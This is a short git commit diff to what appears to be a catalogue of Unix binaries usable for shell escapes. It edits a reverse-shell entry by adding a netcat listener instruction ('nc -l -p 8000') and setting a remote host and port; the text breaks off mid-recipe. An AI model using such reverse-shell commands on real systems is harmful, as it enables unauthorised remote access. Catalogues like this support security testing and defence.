Add missing descriptions

This commit is contained in:
Emilio Pinna
2018-05-22 21:22:20 +01:00
parent 8f992a27f1
commit 158291baa4
4 changed files with 14 additions and 13 deletions

View File

@@ -9,8 +9,9 @@ functions:
!/bin/sh
description: MacOS only.
reverse-shell:
- code: |
RHOST=127.0.0.1
- description: Run `nc -l -p 8000` to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RPORT=8000
TF=$(mktemp)
rm $TF